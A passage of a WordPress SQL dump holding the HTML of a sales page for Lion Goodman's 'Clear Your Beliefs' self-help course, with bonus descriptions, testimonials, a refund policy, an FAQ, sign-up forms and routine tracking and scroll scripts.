Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1870, 2161, '_edit_lock', '1436778014:2'),
(1871, 2161, '_edit_last', '2'),
(1927, 2220, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1649:"[su_box title="The App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Only $4.99!</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true 